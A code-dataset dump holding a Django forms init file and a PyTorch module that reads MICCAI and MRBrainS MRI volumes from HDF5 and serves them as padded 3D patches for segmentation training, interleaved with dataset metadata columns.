out = image.view(32, -1)  # flatten each sample to (32, 3*28*28); the original view(32, 20) does not match the tensor size
print(out.shape)
| zh | 0.412766 | # 一个正常输入对应一个噪声 # 原论文没有的操作 # 将输入和噪声打乱 ##################################################################### # 记录信息 # 给图像添加高斯噪声 # 提取特征向量,进行像素上的归一化 # 特征向量添加高斯噪声 # 梯度清零 # 计算loss # 反向传播 # 更新参数 # 验证集,使用评估模式,该模式下神经网络不会记录梯度 # 输出验证信息 # 保存网络状态 # 删除之前保存的权值文件 # 测试不用加噪声 # data, labels = addGaussianNoise(featureVectors, label, shuffle=False) # 计算loss # image_val_ex = torch.randn((1, 3, 224, 224)) # modelvgg16 = getExtractor('vgg16', True) # modelvgg19 = getExtractor('vgg19', True) # modelAlex = getExtractor('alexnet', True) # # modelResNet = getExtractor('resnet18', True) # out1 = modelResNet(image) # modelResNet = torchvision.models.resnet34(True) # modelResNet = torchvision.models.resnet50(True) | 2.137028 | 2 |
src/cms/forms/authentication/__init__.py | S10MC2015/cms-django | 0 | 6616720 | <filename>src/cms/forms/authentication/__init__.py
"""
Forms related to the user and password management
"""
from .password_reset_form import PasswordResetConfirmForm
| <filename>src/cms/forms/authentication/__init__.py
"""
Forms related to the user and password management
"""
from .password_reset_form import PasswordResetConfirmForm
| en | 0.947168 | Forms related to the user and password management | 1.297676 | 1 |
examples/image/cath/datasets/to_ignore/MRI/mri.py | mariogeiger/se3cnn | 170 | 6616721 | # pylint: disable=C,R,E1101
import torch
import h5py
import numpy as np
import numbers
import sys
miccai_filters = {
'train': ["1000_3",
"1001_3",
"1002_3",
"1006_3",
"1007_3",
"1008_3",
"1009_3",
"1010_3",
"1011_3",
"1012_3",
"1013_3",
"1014_3"],
'validation': ["1015_3",
"1017_3",
"1036_3"],
'test': ["1003_3",
"1004_3",
"1005_3",
"1018_3",
"1019_3",
"1023_3",
"1024_3",
"1025_3",
"1038_3",
"1039_3",
"1101_3",
"1104_3",
"1107_3",
"1110_3",
"1113_3",
"1116_3",
"1119_3",
"1122_3",
"1125_3",
"1128_3"]
}
# check that filters are non-overlapping
assert len(set(miccai_filters['train']).intersection(miccai_filters['validation'])) == 0
assert len(set(miccai_filters['train']).intersection(miccai_filters['test'])) == 0
def get_miccai_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
**read_data_kwargs):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def get_mrbrains_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
N_train):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
print(np.unique(data_set.labels[0]))
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def read_h5_data(dataset, h5_filename, mode, **read_data_kwargs):
''' read MRI datasets from h5 files
:param dataset: selects miccai or mrbrains, the latter with either reduced or full labels
:param h5_filename: path to the h5 file
:param mode: load train, validation or test set
'''
assert dataset in ['miccai', 'mrbrains_reduced', 'mrbrains_full']
assert mode in ['train', 'validation', 'test']
if dataset == 'miccai':
return read_h5_data_miccai(h5_filename, mode, **read_data_kwargs)
else:
label_mode = dataset.split('_')[-1] # 'reduced' or 'full'
return read_h5_data_mrbrains(h5_filename, mode, label_mode, **read_data_kwargs)
def read_h5_data_miccai(h5_filename, mode, filter=None):
''' to be called from read_h5_data '''
data = []
labels = []
unpadded_data_spatial_shape = []
padding_boundary = []
patch_indices = []
if filter == None:
filter = miccai_filters.get(mode)
with h5py.File(h5_filename, 'r') as hf:
for name in filter:
# Assumption: the signal value (index 0) and the label (index 1) are stored in the last dim
signal_volume = hf[name][:][:,:,:,0].squeeze()[np.newaxis,...]
label_volume = hf[name][:][:,:,:,1].squeeze()
data.append(signal_volume)
labels.append(label_volume)
unpadded_data_spatial_shape.append(data[-1].shape[1:])
padding_boundary.append(None)
class_count = hf['class_counts'][:]
# signal_mean = hf['signal_mean'][:]
# signal_std = hf['signal_std'][:]
# bg_values = -signal_mean/signal_std # since original bg value was zero
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
def read_h5_data_mrbrains(h5_filename, mode, label_mode, N_train=4):
''' to be called from read_h5_data
training set is split into N_train training samples and 5-N_train validation samples
'''
with h5py.File(h5_filename, 'r') as hf:
if mode == 'train':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train)]
elif mode == 'validation':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train, 5)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train, 5)]
elif mode == 'test':
data = [hf['test_signal_{}'.format(i)][()] for i in range(15)]
labels = None
class_count = hf['class_counts_{}'.format(label_mode)][:]
unpadded_data_spatial_shape = [d.shape[1:] for d in data]
padding_boundary = [None for d in data]
# channel_means = hf['channel_means'][:]
# channel_stds = hf['channel_stds'][:]
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
class MRISegmentation(torch.utils.data.Dataset):
''' Read 3D medical image files in .nii format, and provide it to the
user as 3D patches of the requested size. Setting
randomize_patch_offsets=True will add random offsets to the
patches to reduce the effect of patch boundaries.
:param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full'
:param h5_filename: path to the hdf5 file
:param mode: load 'train', 'validation' or 'test' set
:param patch_shape:
:param filter: optional - only for miccai select exactly which scans to load
:param randomize_patch_offsets:
# :param pad_mode:
:param pad_constant:
:param read_data_kwargs: keyword-argument options for different datasets
used to pass `filter` for miccai and `N_train` for mrbrains
'''
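# A minimal usage sketch (hypothetical file name and shapes, not from this repo):
#   ds = MRISegmentation('mrbrains_reduced', 'mrbrains.h5', 'train',
#                        patch_shape=32, patch_overlap=8)
#   img, lbl, idx, patch_index, patch_valid = ds[0]
#   # img: (channels, 32, 32, 32) float32 patch, lbl: (1, 32, 32, 32) int64 label patch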
def __init__(self,
dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
randomize_patch_offsets=True,
# pad_mode='constant',
# pad_constant=0,
**read_data_kwargs):
if isinstance(patch_shape, numbers.Integral):
patch_shape = np.repeat(patch_shape, 3)
if isinstance(patch_overlap, numbers.Integral):
patch_overlap = np.repeat(patch_overlap, 3)
self.patch_shape = patch_shape
self.patch_overlap = patch_overlap
self.randomize_patch_offsets = randomize_patch_offsets
# self.pad_mode = pad_mode
# self.pad_constant = pad_constant
# self.log10_signal = log10_signal
# Read H5 file
print("Reading data...", end="")
sys.stdout.flush()
self.data, self.labels, self.unpadded_data_spatial_shape, self.padding_boundary, self.class_count = \
read_h5_data(dataset, h5_filename, mode, **read_data_kwargs)
print("done.")
# This first call to initialize_patch_indices will calculate the
# total padding around each image, and store it in self.padding_boundary
self.initialize_patch_indices()
# The total padding is fixed to a multiple of the patch size - we
# can therefore add the full padding in the setup phase
print("Applying padding...", end="")
sys.stdout.flush()
for i, image in enumerate(self.data):
pad_width = self.padding_boundary[i]
# for data which contains a channel dimension add an entry to pad_width
if len(self.data[i].shape) == 4:
pad_width_data = np.insert(pad_width, 0, values=0, axis=0)
# self.data[i] = np.pad(self.data[i], pad_width_data,
# mode=self.pad_mode,
# constant_values=self.pad_constant)
# self.labels[i] = np.pad(self.labels[i], pad_width,
# mode=self.pad_mode,
# constant_values=self.pad_constant).astype(np.int64)
pad_mode = 'symmetric' # constant value padding unclear for some signal channels
self.data[i] = np.pad(self.data[i], pad_width_data, mode=pad_mode)
self.labels[i] = np.pad(self.labels[i], pad_width, mode=pad_mode).astype(np.int64)
print("done.")
# # optionally logarithmize zero shifted input signal
# if self.log10_signal:
# print('logarithmize signal')
# signal_min = min([np.min(data_i) for data_i in self.data])
# for i in range(len(self.data)):
# self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log
def get_original(self, dataset_index):
"""Get full input image at specified index"""
size = self.unpadded_data_spatial_shape[dataset_index]
patch_index_start = self.padding_boundary[dataset_index][:,0]
patch_index_end = patch_index_start + size
patch_index = np.stack((patch_index_start, patch_index_end))
return (self.data[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]],
self.labels[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]])
def initialize_patch_indices(self):
"""For each image, calculate the indices for each patch, possibly
shifted by a random offset"""
self.patch_indices = []
for i, image in enumerate(self.data):
patch_indices, overflow = self.calc_patch_indices(
self.unpadded_data_spatial_shape[i],
self.patch_shape,
overlap=self.patch_overlap,
randomize_offset=self.randomize_patch_offsets)
patch_indices = np.append(np.full(shape=(patch_indices.shape[0],1),
fill_value=i),
patch_indices, axis=1)
self.patch_indices += patch_indices.tolist()
# Keep track of how much each image has been padded
if self.padding_boundary[i] is None:
pad_width = np.stack([overflow, overflow], axis=1)
self.padding_boundary[i] = pad_width
def __getitem__(self, index):
"""Retrieve a single patch"""
# Which image to retrieve patch from
dataset_index = self.patch_indices[index][0]
# Extract image and label
image = self.data[dataset_index]
labels = self.labels[dataset_index]
# Obtain patch indices into original image
patch_index_start = np.array(self.patch_indices[index][1:],
dtype=np.int16)
patch_index_end = patch_index_start + self.patch_shape
patch_index = np.stack((patch_index_start, patch_index_end))
patch_valid = np.stack(patch_index).clip(
min=0, max=self.unpadded_data_spatial_shape[dataset_index]) - patch_index[0]
# Update patch indices to padded image
patch_index_padded = patch_index + self.padding_boundary[dataset_index][:,0]
# # OLD VERSION
# # assumed images not to have channel dimension yet and hence adds it
# Lookup image and add channel dimension
# image_patch = np.expand_dims(
# image[patch_index_padded[0, 0]:patch_index_padded[1, 0],
# patch_index_padded[0, 1]:patch_index_padded[1, 1],
# patch_index_padded[0, 2]:patch_index_padded[1, 2]],
# axis=0).astype(np.float32)
# Slice image patch
image_patch = image[:, patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]].astype(np.float32)
# Slice label patch and add dimension
labels_patch = np.expand_dims(
labels[patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]],
axis=0)
# print("image: ", image_patch)
# Check that patch has the correct size
assert np.all(image_patch[0].shape == self.patch_shape)
assert np.all(labels_patch[0].shape == self.patch_shape)
return image_patch, labels_patch, dataset_index, patch_index, patch_valid
def __len__(self):
return len(self.patch_indices)
@staticmethod
def calc_patch_indices(image_shape,
patch_shape,
overlap=0,
randomize_offset=True,
minimum_overflow_fraction=0.25):
"""
Given the image shape and the patch shape, calculate the placement
of patches. If randomize_offset is on, it will randomize the placement,
so that the patch boundaries affect different regions in each epoch.
There is natural room for this randomization whenever the image size
is not divisible by the patch size, in the sense that the overflow
can be placed arbitrarily at the beginning or the end. If you want
to ensure that some randomization will always occur, you can set
minimum_overflow_fraction, which will ensure that an extra patch will
be added to provide extra overflow if necessary.
:param image_shape: Shape of input image
:param patch_shape: Shape of patch
:param overlap: Allow patches to overlap with this number of voxels
:param randomize_offset: Whether patch placement should be randomized
:param minimum_overflow_fraction: Specify to force overflow beyond image
to be at least this fraction of the patch size
:return:
"""
if isinstance(overlap, numbers.Integral):
overlap = np.repeat(overlap, len(image_shape))
# Effective patch shape
eff_patch_shape = (patch_shape - overlap)
# Number of patches (rounding up)
n_patches = np.ceil((image_shape - patch_shape) / eff_patch_shape + 1).astype(int)
# Overflow of voxels beyond image
overflow = eff_patch_shape * n_patches - image_shape + overlap
if randomize_offset:
# Add extra patch for dimensions where minimum is below fraction
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
# Select random start index so that overlap is spread randomly
# on both sides. If overflow is larger than patch_shape
max_start_offset = overflow
start_index = -np.array([np.random.choice(offset + 1)
for offset in max_start_offset])
else:
# Set start index so that the overflow is spread evenly on both sides
start_index = -np.ceil(overflow/2).astype(int)
# In the non-randomized setting, we still want to make sure that the
# last patch sticks outside the image with at least overlap/2, i.e.,
# that overflow/2 > overlap/2 (since the overflow is distributed
# evenly on both sides in this non-randomized branch)
extra_patch = (overflow < overlap)
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow < overlap)
# stop_index = image_shape + start_index + overflow
step_size = eff_patch_shape
stop_index = start_index + step_size*n_patches
return (np.mgrid[start_index[0]:stop_index[0]:step_size[0],
start_index[1]:stop_index[1]:step_size[1],
start_index[2]:stop_index[2]:step_size[2]].reshape(3, -1).T,
overflow)
| # pylint: disable=C,R,E1101
import torch
import h5py
import numpy as np
import numbers
import sys
miccai_filters = {
'train': ["1000_3",
"1001_3",
"1002_3",
"1006_3",
"1007_3",
"1008_3",
"1009_3",
"1010_3",
"1011_3",
"1012_3",
"1013_3",
"1014_3"],
'validation': ["1015_3",
"1017_3",
"1036_3"],
'test': ["1003_3",
"1004_3",
"1005_3",
"1018_3",
"1019_3",
"1023_3",
"1024_3",
"1025_3",
"1038_3",
"1039_3",
"1101_3",
"1104_3",
"1107_3",
"1110_3",
"1113_3",
"1116_3",
"1119_3",
"1122_3",
"1125_3",
"1128_3"]
}
# check that filters are non-overlapping
assert len(set(miccai_filters['train']).intersection(miccai_filters['validation'])) == 0
assert len(set(miccai_filters['train']).intersection(miccai_filters['test'])) == 0
def get_miccai_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
**read_data_kwargs):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def get_mrbrains_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
N_train):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
print(np.unique(data_set.labels[0]))
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def read_h5_data(dataset, h5_filename, mode, **read_data_kwargs):
''' read MRI datasets from h5 files
:param dataset: selects miccai or mrbrains, the latter with either reduced or full labels
:param h5_filename: path to the h5 file
:param mode: load train, validation or test set
'''
assert dataset in ['miccai', 'mrbrains_reduced', 'mrbrains_full']
assert mode in ['train', 'validation', 'test']
if dataset == 'miccai':
return read_h5_data_miccai(h5_filename, mode, **read_data_kwargs)
else:
label_mode = dataset.split('_')[-1] # 'reduced' or 'full'
return read_h5_data_mrbrains(h5_filename, mode, label_mode, **read_data_kwargs)
def read_h5_data_miccai(h5_filename, mode, filter=None):
''' to be called from read_h5_data '''
data = []
labels = []
unpadded_data_spatial_shape = []
padding_boundary = []
patch_indices = []
if filter == None:
filter = miccai_filters.get(mode)
with h5py.File(h5_filename, 'r') as hf:
for name in filter:
# Assumption: the signal value (index 0) and the label (index 1) are stored in the last dim
signal_volume = hf[name][:][:,:,:,0].squeeze()[np.newaxis,...]
label_volume = hf[name][:][:,:,:,1].squeeze()
data.append(signal_volume)
labels.append(label_volume)
unpadded_data_spatial_shape.append(data[-1].shape[1:])
padding_boundary.append(None)
class_count = hf['class_counts'][:]
# signal_mean = hf['signal_mean'][:]
# signal_std = hf['signal_std'][:]
# bg_values = -signal_mean/signal_std # since original bg value was zero
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
def read_h5_data_mrbrains(h5_filename, mode, label_mode, N_train=4):
''' to be called from read_h5_data
training set is split into N_train training samples and 5-N_train validation samples
'''
with h5py.File(h5_filename, 'r') as hf:
if mode == 'train':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train)]
elif mode == 'validation':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train, 5)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train, 5)]
elif mode == 'test':
data = [hf['test_signal_{}'.format(i)][()] for i in range(15)]
labels = None
class_count = hf['class_counts_{}'.format(label_mode)][:]
unpadded_data_spatial_shape = [d.shape[1:] for d in data]
padding_boundary = [None for d in data]
# channel_means = hf['channel_means'][:]
# channel_stds = hf['channel_stds'][:]
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
class MRISegmentation(torch.utils.data.Dataset):
''' Read 3D medical image files in .nii format, and provide it to the
user as 3D patches of the requested size. Setting
randomize_patch_offsets=True will add random offsets to the
patches to reduce the effect of patch boundaries.
:param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full'
:param h5_filename: path to the hdf5 file
:param mode: load 'train', 'validation' or 'test' set
:param patch_shape:
:param filter: optional - only for miccai select exactly which scans to load
:param randomize_patch_offsets:
# :param pad_mode:
:param pad_constant:
:param read_data_kwargs: keyword-argument options for different datasets
used to pass `filter` for miccai and `N_train` for mrbrains
'''
def __init__(self,
dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
randomize_patch_offsets=True,
# pad_mode='constant',
# pad_constant=0,
**read_data_kwargs):
if isinstance(patch_shape, numbers.Integral):
patch_shape = np.repeat(patch_shape, 3)
if isinstance(patch_overlap, numbers.Integral):
patch_overlap = np.repeat(patch_overlap, 3)
self.patch_shape = patch_shape
self.patch_overlap = patch_overlap
self.randomize_patch_offsets = randomize_patch_offsets
# self.pad_mode = pad_mode
# self.pad_constant = pad_constant
# self.log10_signal = log10_signal
# Read H5 file
print("Reading data...", end="")
sys.stdout.flush()
self.data, self.labels, self.unpadded_data_spatial_shape, self.padding_boundary, self.class_count = \
read_h5_data(dataset, h5_filename, mode, **read_data_kwargs)
print("done.")
# This first call to initialize_patch_indices will calculate the
# total padding around each image, and store it in self.padding_boundary
self.initialize_patch_indices()
# The total padding is fixed to a multiple of the patch size - we
# can therefore add the full padding in the setup phase
print("Applying padding...", end="")
sys.stdout.flush()
for i, image in enumerate(self.data):
pad_width = self.padding_boundary[i]
# for data which contains a channel dimension add an entry to pad_width
if len(self.data[i].shape) == 4:
pad_width_data = np.insert(pad_width, 0, values=0, axis=0)
# self.data[i] = np.pad(self.data[i], pad_width_data,
# mode=self.pad_mode,
# constant_values=self.pad_constant)
# self.labels[i] = np.pad(self.labels[i], pad_width,
# mode=self.pad_mode,
# constant_values=self.pad_constant).astype(np.int64)
pad_mode = 'symmetric' # constant value padding unclear for some signal channels
self.data[i] = np.pad(self.data[i], pad_width_data, mode=pad_mode)
self.labels[i] = np.pad(self.labels[i], pad_width, mode=pad_mode).astype(np.int64)
print("done.")
# # optionally logarithmize zero shifted input signal
# if self.log10_signal:
# print('logarithmize signal')
# signal_min = min([np.min(data_i) for data_i in self.data])
# for i in range(len(self.data)):
# self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log
def get_original(self, dataset_index):
"""Get full input image at specified index"""
size = self.unpadded_data_spatial_shape[dataset_index]
patch_index_start = self.padding_boundary[dataset_index][:,0]
patch_index_end = patch_index_start + size
patch_index = np.stack((patch_index_start, patch_index_end))
return (self.data[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]],
self.labels[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]])
def initialize_patch_indices(self):
"""For each image, calculate the indices for each patch, possibly
shifted by a random offset"""
self.patch_indices = []
for i, image in enumerate(self.data):
patch_indices, overflow = self.calc_patch_indices(
self.unpadded_data_spatial_shape[i],
self.patch_shape,
overlap=self.patch_overlap,
randomize_offset=self.randomize_patch_offsets)
patch_indices = np.append(np.full(shape=(patch_indices.shape[0],1),
fill_value=i),
patch_indices, axis=1)
self.patch_indices += patch_indices.tolist()
# Keep track of how much each image has been padded
if self.padding_boundary[i] is None:
pad_width = np.stack([overflow, overflow], axis=1)
self.padding_boundary[i] = pad_width
def __getitem__(self, index):
"""Retrieve a single patch"""
# Which image to retrieve patch from
dataset_index = self.patch_indices[index][0]
# Extract image and label
image = self.data[dataset_index]
labels = self.labels[dataset_index]
# Obtain patch indices into original image
patch_index_start = np.array(self.patch_indices[index][1:],
dtype=np.int16)
patch_index_end = patch_index_start + self.patch_shape
patch_index = np.stack((patch_index_start, patch_index_end))
patch_valid = np.stack(patch_index).clip(
min=0, max=self.unpadded_data_spatial_shape[dataset_index]) - patch_index[0]
# Update patch indices to padded image
patch_index_padded = patch_index + self.padding_boundary[dataset_index][:,0]
# # OLD VERSION
# # assumed images not to have channel dimension yet and hence adds it
# Lookup image and add channel dimension
# image_patch = np.expand_dims(
# image[patch_index_padded[0, 0]:patch_index_padded[1, 0],
# patch_index_padded[0, 1]:patch_index_padded[1, 1],
# patch_index_padded[0, 2]:patch_index_padded[1, 2]],
# axis=0).astype(np.float32)
# Slice image patch
image_patch = image[:, patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]].astype(np.float32)
# Slice label patch and add dimension
labels_patch = np.expand_dims(
labels[patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]],
axis=0)
# print("image: ", image_patch)
# Check that patch has the correct size
assert np.all(image_patch[0].shape == self.patch_shape)
assert np.all(labels_patch[0].shape == self.patch_shape)
return image_patch, labels_patch, dataset_index, patch_index, patch_valid
def __len__(self):
return len(self.patch_indices)
@staticmethod
def calc_patch_indices(image_shape,
patch_shape,
overlap=0,
randomize_offset=True,
minimum_overflow_fraction=0.25):
"""
Given the image shape and the patch shape, calculate the placement
of patches. If randomize_offset is on, it will randomize the placement,
so that the patch boundaries affect different regions in each epoch.
There is natural room for this randomization whenever the image size
is not divisible by the patch size, in the sense that the overflow
can be placed arbitrarily at the beginning or the end. If you want
to ensure that some randomization will always occur, you can set
minimum_overflow_fraction, which will ensure that an extra patch will
be added to provide extra overflow if necessary.
:param image_shape: Shape of input image
:param patch_shape: Shape of patch
:param overlap: Allow patches to overlap with this number of voxels
:param randomize_offset: Whether patch placement should be randomized
:param minimum_overflow_fraction: Specify to force overflow beyond image
to be at least this fraction of the patch size
:return:
"""
if isinstance(overlap, numbers.Integral):
overlap = np.repeat(overlap, len(image_shape))
# Effective patch shape
eff_patch_shape = (patch_shape - overlap)
# Number of patches (rounding up)
n_patches = np.ceil((image_shape - patch_shape) / eff_patch_shape + 1).astype(int)
# Overflow of voxels beyond image
overflow = eff_patch_shape * n_patches - image_shape + overlap
if randomize_offset:
# Add extra patch for dimensions where minimum is below fraction
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
# Select random start index so that overlap is spread randomly
# on both sides. If overflow is larger than patch_shape
max_start_offset = overflow
start_index = -np.array([np.random.choice(offset + 1)
for offset in max_start_offset])
else:
# Set start index so that the overflow is spread evenly on both sides
start_index = -np.ceil(overflow/2).astype(int)
# In the non-randomized setting, we still want to make sure that the
# last patch sticks outside the image with at least overlap/2, i.e.,
# that overflow/2 > overlap/2 (since the overflow is distributed
# evenly on both sides in this non-randomized branch)
extra_patch = (overflow < overlap)
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow < overlap)
# stop_index = image_shape + start_index + overflow
step_size = eff_patch_shape
stop_index = start_index + step_size*n_patches
return (np.mgrid[start_index[0]:stop_index[0]:step_size[0],
start_index[1]:stop_index[1]:step_size[1],
start_index[2]:stop_index[2]:step_size[2]].reshape(3, -1).T,
overflow)
| en | 0.801638 | # pylint: disable=C,R,E1101 # check that filters are non-overlapping read MRI datasets from h5 files :param dataset: selects miccai or mrbrains, the latter with either reduced or full labels :param h5_filename: path to the h5 file :param mode: load train, validation or test set # 'reduced' or 'full' to be called from read_h5_data # Assumption: voxel value and pixel are stored in last dim # signal_mean = hf['signal_mean'][:] # signal_std = hf['signal_std'][:] # bg_values = -signal_mean/signal_std # since original bg value was zero to be called from read_h5_data training set is split into N_train training samples and 5-N_train validation samples # channel_means = hf['channel_means'][:] # channel_stds = hf['channel_stds'][:] Read 3D medical image files in .nii format, and provide it to the user as 3D patches of the requested size. Setting randomize_patch_offsets=True will add random offsets to the patches to reduce the affect of patch boundaries. :param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full' :param h5_filename: path to the hdf5 file :param mode: load 'train', 'validation' or 'test' set :param patch_shape: :param filter: optional - only for miccai select exactly which scans to load :param randomize_patch_offsets: # :param pad_mode: :param pad_constant: :param read_data_kwargs: keywordargs options for different datasets used to pass `filter` for miccai and `N_train` for mrbrains # pad_mode='constant', # pad_constant=0, # self.pad_mode = pad_mode # self.pad_constant = pad_constant # self.log10_signal = log10_signal # Read H5 file # This first call to initialize_patch_indices will calculate the # total padding around each image, and store it in self.padding_boundary # The total padding is fixed to a multiple of the patch size - we # can therefore add the full padding in the setup fase # for data which contains a channel dimension add an entry to pad_width # self.data[i] = np.pad(self.data[i], pad_width_data, # mode=self.pad_mode, # constant_values=self.pad_constant) # self.labels[i] = np.pad(self.labels[i], pad_width, # mode=self.pad_mode, # constant_values=self.pad_constant).astype(np.int64) # constant value padding unclear for some signal channels # # optionally logarithmize zero shifted input signal # if self.log10_signal: # print('logarithmize signal') # signal_min = min([np.min(data_i) for data_i in self.data]) # for i in range(len(self.data)): # self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log Get full input image at specified index For each image, calculate the indices for each patch, possibly shifted by a random offset # Keep track of how much each image has been padded Retrieve a single patch # Which image to retrieve 